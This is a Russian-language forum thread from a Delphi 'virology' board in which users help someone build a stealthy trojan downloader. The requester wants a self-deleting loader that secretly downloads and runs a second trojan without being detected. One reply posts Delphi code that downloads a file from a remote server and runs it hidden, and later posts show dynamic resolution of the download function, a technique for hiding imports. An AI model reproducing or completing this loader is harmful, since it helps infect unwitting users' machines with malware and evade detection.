Четверг, 25.04.2024, 15:06 Приветствую вас Гость | Группа "Гости" 
[ Новые сообщения · Участники · Правила форума · Поиск · RSS ]
  • Страница 1 из 1
  • 1
Модератор форума: Волк-1024, Anton93, xXxSh@dowxXx  
delphicode » Delphi » Вирусология Delphi » Trojan.Downloader (Поделитесь))
Trojan.Downloader
-Drayver-Дата: Пятница, 11.03.2011, 15:28 | Сообщение # 1
Был не раз
Зарегистрирован: 01.03.2011
Группа: Пользователи
Сообщений: 10
Статус: Offline
Поделитесь исходником етого трояна.
Если возможно сразу с даннымы функциямы.Главное чтоб не палим был.
После открытия троя - он самоудаляется,скачеет с данного сервера второй трой он весит 3.2м второй трой тоже самоудаляеться только требуется чтобы трой скачал скритно и запустил файл.
Если можно(было бы не плохо поставить таймер на скачку а точнее чтобы не сразу скачал)
Всем заранее спасибо.Надеюсь на вашу помощь.
 
gravitasДата: Пятница, 11.03.2011, 18:26 | Сообщение # 2
Авторитетный
Зарегистрирован: 01.05.2010
Группа: Пользователи
Сообщений: 385
Статус: Offline
Модуль UrlMon. Процедура UrlToFile вроде бы.
Тут вопросы, а не заказы на софт, да еще и за бесплатно.
 
Anton93Дата: Пятница, 11.03.2011, 19:19 | Сообщение # 3
Продвинутый
Зарегистрирован: 06.01.2010
Группа: Модераторы
Сообщений: 320
Статус: Offline
за валюту всё решаемо biggrin wink
 
Sector009Дата: Суббота, 16.07.2011, 19:40 | Сообщение # 4
Был не раз
Зарегистрирован: 07.10.2010
Группа: Пользователи
Сообщений: 6
Статус: Offline
Code
program pr1;
uses
urlmon,
ShellApi,
windows,
Sockets;
procedure d1;
var
file,dir,site:string;
Begin
UrlDownLoadToFile(nil, Pchar(site+'/ '+file), Pchar(dir+'/ '+file), 0, nil);
ShellExecute(0,' OPEN',dir+'/'+file,Nil,Nil, SW_HIDE);
sleep(100);
exit;
end;
begin
end.

Gravitas: используем теги.
 
raviti2Дата: Суббота, 16.07.2011, 21:30 | Сообщение # 5
Был не раз
Зарегистрирован: 14.01.2011
Группа: Пользователи
Сообщений: 15
Статус: Offline
Доступно только для пользователей

Сообщение отредактировал raviti2 - Суббота, 16.07.2011, 21:32
 
gravitasДата: Воскресенье, 17.07.2011, 19:53 | Сообщение # 6
Авторитетный
Зарегистрирован: 01.05.2010
Группа: Пользователи
Сообщений: 385
Статус: Offline
raviti2, вы не так поняли значение слова "лоадер"... Посмотрите пост №4 - там примерно то, что нужно было ТС'у.
TheDeduction

Для ускорения получения ответов на ваши вопросы рекомендуется подкармливание в виде +'ов в рейтинг :)
 
LauriДата: Пятница, 29.07.2011, 12:45 | Сообщение # 7
Новичок
Зарегистрирован: 28.07.2011
Группа: Пользователи
Сообщений: 4
Статус: Offline
А как например выдрать функцию UrlDownloadToFIle из urlmon?
 
C@TДата: Пятница, 29.07.2011, 21:08 | Сообщение # 8
Авторитетный
Зарегистрирован: 06.03.2010
Группа: Модераторы
Сообщений: 265
Статус: Offline
Quote (Lauri)
А как например выдрать функцию UrlDownloadToFIle из urlmon?

можно просто написать что ты ее импортируешь, можно вызвать GetProcAddr и получить адресс функции
Code

GetProcAddr(LoadLibrary('urlmon.dll'),'UrlDownloadToFIleA');


а если тебе именно сам код функции нужен то можно дизасемблировать urlmon.dll и посмотреть в ней эту функцию
 
LauriДата: Суббота, 30.07.2011, 16:20 | Сообщение # 9
Новичок
Зарегистрирован: 28.07.2011
Группа: Пользователи
Сообщений: 4
Статус: Offline
Quote (C@T)
Quote (Lauri)А как например выдрать функцию UrlDownloadToFIle из urlmon? можно просто написать что ты ее импортируешь, можно вызвать GetProcAddr и получить адресс функции view plaincopy to clipboardprint?
  GetProcAddr(LoadLibrary('urlmon.dll'),'UrlDownloadToFIleA'); 
  
GetProcAddr(LoadLibrary('urlmon.dll'),'UrlDownloadToFIleA');
а если тебе именно сам код функции нужен то можно дизасемблировать urlmon.dll и посмотреть в ней эту функцию

я смотрел urlmon.pas думал выдернуть саму функцию оттуда, как залез... столько кода что ппц + всё взаимосвязано так что хз как быть sad
 
delphicode » Delphi » Вирусология Delphi » Trojan.Downloader (Поделитесь))
  • Страница 1 из 1
  • 1
Поиск:

delphicode.ru © 2008 - 2024 Хостинг от uCoz